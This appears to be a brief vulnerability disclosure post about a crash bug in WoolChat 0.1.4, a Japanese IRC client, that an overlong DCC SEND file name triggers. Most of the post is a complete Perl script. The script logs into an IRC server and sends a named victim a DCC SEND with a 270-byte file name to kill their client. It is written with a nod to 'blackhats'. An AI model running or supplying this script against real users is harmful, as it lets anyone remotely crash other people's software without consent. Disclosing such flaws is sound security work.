Hi, I found a bug about WoolChat (japanese popular irc client) http://www.vector.co.jp/soft/win95/net/se091872.html which allow anyone to kill victim's WoolChat. It has a problem to handle DCC SEND query so if 260 (or more) bytes file name is specified, it exits immediately with error dialog. DoS script (in perl) here: #!/usr/bin/perl # ---- doswchat.pl # DoS against WoolChat 0.1.4 # greetz to: Japanese all blackhats =) # written by White_E # http://nogimmick.org/ use Socket; my $vict=$ARGV[0] || die "usage: $0 \n"; my ($host,$port)=('irc.tokyo.wide.ad.jp','6664'); # modify my ($user,$nick)=('USER USER USER USER','bnzyrgwp'); # modify my $recv; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')); select(S);$|=1;select(STDOUT);$|=1; my $paddr=pack_sockaddr_in($port,inet_aton($host)); connect(S,$paddr) || die "ERR: connect()\n"; print "[*] connected to server.\n"; print S "USER $user\r\nNICK $nick\r\n"; print "[*] USER and NICK sent.\n"; foreach (0..40) { $recv=; # print $recv; last if ($recv =~ m/\s+376\s+/); # end of motd } my $file='A' x 270; my $size='999'; my $msg="privmsg $vict :\x01DCC SEND $file 1234567890 2004 $size\x01\r\n"; print S $msg; print "[*] attack done.\n"; print S "quit\r\n"; close(S); exit; Regards, ---- White_E http://nogimmick.org/